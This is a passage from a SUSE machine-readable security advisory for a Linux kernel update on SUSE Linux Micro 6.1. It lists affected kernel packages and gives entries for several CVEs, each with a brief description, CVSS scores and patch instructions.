"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23010 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23010/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-02-24T09:10:01Z",
"generator": {
"date": "2026-02-24T09:10:01Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20498-1",
"initial_release_date": "2026-02-24T09:10:01Z",
"revision_history": [
{
"date": "2026-02-24T09:10:01Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.4.0-39.1.aarch64",
"product": {
"name": "kernel-default-6.4.0-39.1.aarch64",
"product_id": "kernel-default-6.4.0-39.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.4.0-39.1.21.16.aarch64",
"product": {
"name": "kernel-default-base-6.4.0-39.1.21.16.aarch64",
"product_id": "kernel-default-base-6.4.0-39.1.21.16.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.4.0-39.1.aarch64",
"product": {
"name": "kernel-default-devel-6.4.0-39.1.aarch64",
"product_id": "kernel-default-devel-6.4.0-39.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-6.4.0-39.1.noarch",
"product": {
"name": "kernel-devel-6.4.0-39.1.noarch",
"product_id": "kernel-devel-6.4.0-39.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-macros-6.4.0-39.1.noarch",
"product": {
"name": "kernel-macros-6.4.0-39.1.noarch",
"product_id": "kernel-macros-6.4.0-39.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-6.4.0-39.1.noarch",
"product": {
"name": "kernel-source-6.4.0-39.1.noarch",
"product_id": "kernel-source-6.4.0-39.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.4.0-39.1.ppc64le",
"product": {
"name": "kernel-default-6.4.0-39.1.ppc64le",
"product_id": "kernel-default-6.4.0-39.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"product": {
"name": "kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"product_id": "kernel-default-base-6.4.0-39.1.21.16.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.4.0-39.1.ppc64le",
"product": {
"name": "kernel-default-devel-6.4.0-39.1.ppc64le",
"product_id": "kernel-default-devel-6.4.0-39.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.4.0-39.1.s390x",
"product": {
"name": "kernel-default-6.4.0-39.1.s390x",
"product_id": "kernel-default-6.4.0-39.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.4.0-39.1.s390x",
"product": {
"name": "kernel-default-devel-6.4.0-39.1.s390x",
"product_id": "kernel-default-devel-6.4.0-39.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.4.0-39.1.s390x",
"product": {
"name": "kernel-default-livepatch-6.4.0-39.1.s390x",
"product_id": "kernel-default-livepatch-6.4.0-39.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.4.0-39.1.x86_64",
"product": {
"name": "kernel-default-6.4.0-39.1.x86_64",
"product_id": "kernel-default-6.4.0-39.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.4.0-39.1.21.16.x86_64",
"product": {
"name": "kernel-default-base-6.4.0-39.1.21.16.x86_64",
"product_id": "kernel-default-base-6.4.0-39.1.21.16.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.4.0-39.1.x86_64",
"product": {
"name": "kernel-default-devel-6.4.0-39.1.x86_64",
"product_id": "kernel-default-devel-6.4.0-39.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.4.0-39.1.x86_64",
"product": {
"name": "kernel-default-livepatch-6.4.0-39.1.x86_64",
"product_id": "kernel-default-livepatch-6.4.0-39.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.4.0-39.1.x86_64",
"product": {
"name": "kernel-kvmsmall-6.4.0-39.1.x86_64",
"product_id": "kernel-kvmsmall-6.4.0-39.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.1",
"product": {
"name": "SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sl-micro:6.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-39.1.aarch64 as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64"
},
"product_reference": "kernel-default-6.4.0-39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-39.1.ppc64le as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le"
},
"product_reference": "kernel-default-6.4.0-39.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-39.1.s390x as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x"
},
"product_reference": "kernel-default-6.4.0-39.1.s390x",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-39.1.x86_64 as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64"
},
"product_reference": "kernel-default-6.4.0-39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.4.0-39.1.21.16.aarch64 as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64"
},
"product_reference": "kernel-default-base-6.4.0-39.1.21.16.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.4.0-39.1.21.16.ppc64le as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le"
},
"product_reference": "kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.4.0-39.1.21.16.x86_64 as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64"
},
"product_reference": "kernel-default-base-6.4.0-39.1.21.16.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.4.0-39.1.aarch64 as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64"
},
"product_reference": "kernel-default-devel-6.4.0-39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.4.0-39.1.ppc64le as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le"
},
"product_reference": "kernel-default-devel-6.4.0-39.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.4.0-39.1.s390x as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x"
},
"product_reference": "kernel-default-devel-6.4.0-39.1.s390x",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.4.0-39.1.x86_64 as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64"
},
"product_reference": "kernel-default-devel-6.4.0-39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.4.0-39.1.s390x as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x"
},
"product_reference": "kernel-default-livepatch-6.4.0-39.1.s390x",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.4.0-39.1.x86_64 as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64"
},
"product_reference": "kernel-default-livepatch-6.4.0-39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-6.4.0-39.1.noarch as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch"
},
"product_reference": "kernel-devel-6.4.0-39.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.4.0-39.1.x86_64 as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64"
},
"product_reference": "kernel-kvmsmall-6.4.0-39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-macros-6.4.0-39.1.noarch as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch"
},
"product_reference": "kernel-macros-6.4.0-39.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-6.4.0-39.1.noarch as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
},
"product_reference": "kernel-source-6.4.0-39.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-42752",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-42752"
}
],
"notes": [
{
"category": "general",
"text": "An integer overflow flaw was found in the Linux kernel. This issue leads to the kernel allocating `skb_shared_info` in the userspace, which is exploitable in systems without SMAP protection since `skb_shared_info` contains references to function pointers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-42752",
"url": "https://www.suse.com/security/cve/CVE-2023-42752"
},
{
"category": "external",
"summary": "SUSE Bug 1215146 for CVE-2023-42752",
"url": "https://bugzilla.suse.com/1215146"
},
{
"category": "external",
"summary": "SUSE Bug 1215468 for CVE-2023-42752",
"url": "https://bugzilla.suse.com/1215468"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2023-42752"
},
{
"cve": "CVE-2023-53714",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53714"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/stm: ltdc: fix late dereference check\n\nIn ltdc_crtc_set_crc_source(), struct drm_crtc was dereferenced in a\ncontainer_of() before the pointer check. This could cause a kernel panic.\n\nFix this smatch warning:\ndrivers/gpu/drm/stm/ltdc.c:1124 ltdc_crtc_set_crc_source() warn: variable dereferenced before check \u0027crtc\u0027 (see line 1119)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53714",
"url": "https://www.suse.com/security/cve/CVE-2023-53714"
},
{
"category": "external",
"summary": "SUSE Bug 1254465 for CVE-2023-53714",
"url": "https://bugzilla.suse.com/1254465"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53714"
},
{
"cve": "CVE-2023-53743",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53743"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: Free released resource after coalescing\n\nrelease_resource() doesn\u0027t actually free the resource or resource list\nentry so free the resource list entry to avoid a leak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53743",
"url": "https://www.suse.com/security/cve/CVE-2023-53743"
},
{
"category": "external",
"summary": "SUSE Bug 1254782 for CVE-2023-53743",
"url": "https://bugzilla.suse.com/1254782"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
